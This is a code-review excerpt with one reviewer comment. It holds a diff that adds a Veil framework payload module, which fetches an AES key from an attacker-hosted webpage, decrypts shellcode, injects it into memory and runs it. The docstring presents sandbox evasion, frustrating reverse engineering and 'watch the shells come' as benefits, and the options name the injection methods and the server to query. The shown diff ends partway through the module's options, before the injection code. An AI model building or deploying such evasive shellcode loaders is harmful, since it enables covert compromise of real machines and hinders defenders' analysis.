modules/payloads/python/shellcode_inject/aes_encrypt_HTTPKEY_Request.py

```diff
@@ -0,0 +1,456 @@
+"""
+
+This payload has AES encrypted shellcode stored on a webserver.  At runtime, the executable
+uses the key from a HTML requet holding the key, using md5 to hash the html output and produce 
+required 16 Byte key. Than injects it into memory, and executes it.
+
+[*] Logic:
+- HTTP Request on your hosted webpage:                                     <-----
+    DOWN ----> Sleep and try to reach supplied webpage using HTTP response code |
+    UP ----> Preform MD5 hash of HTML of webpage:
+        MD5 ---> pass to decryption function:
+            CalL Shellcode ----> Shellcode invojes callback: WIN 
+
+
+[*] Benefits:
+- Uses urllib2 to make get request against supplied server and returns the 
+  HTML text for md5 hashing.
+- Prevents Key being deployed with payload, preventing payload to run in sandbox
+  if target server is taken offline during initial deployment.
+- Once use of payload is over, take down webserver to prevent future infections
+- Static and future dynamic RE is near impossible without proper data collection. 
+- Proper web log monitoring will identify when webserver is burnt and crucial to 
+  remove key to prevent future ability to RE binary. Defenders would need to capture 
+  live memory to capture key.
+- Devloped custom HTML login page to be hosted as key for payload
+
+
+
+---------------------------------------
+Based off AES encrypt module by @christruncer 
+
+module by @KillSwitch-GUI
+
+
+"""
+
+import urllib2
+import md5
+
+from datetime import date
+from datetime import timedelta
+
+from modules.common import shellcode
+from modules.common import helpers
+from modules.common import encryption
+
+
+class Payload:
+    
+    def __init__(self):
+        # required options
+        self.description = """AES Encrypted shellcode is decrypted upon HTTP request, injected into memory, and executed. 
+        [*] Usage: Deploy webserver with cloned website, activate html page hosting key at specified URL. After building payload
+        with Veil bring down hosted page. after delivery of binary stand up stagging server and watch the shells come."""
+        self.language = "python"
+        self.extension = "py"
+        self.rating = "Excellent"
+        
+        self.shellcode = shellcode.Shellcode()
+        
+        # options we require user interaction for- format is {Option : [Value, Description]]}
+        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
+                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
+                                 "inject_method" : ["Virtual", "Virtual, Void, Heap"],
+                                 "sleep_time" : ["60", "Set the sleep time between HTTP Key request"],
+                                 "target_server" : ["http://www.guimp.com/", "Set target HTML server to query for decryption key"],
+                                 "html_file_name" : ["/root/Desktop/wordpress.html", "Set the output of HTML file name"]}
```

Comment:
Also, can you have this auto-detect the name based off of what is used in the target server?  So if there is a URI provided, use that for the name?  If not, then assume index.html?  Then this is purely the path where the file is saved?  

Not a requirement, but just interested in your thoughts on it.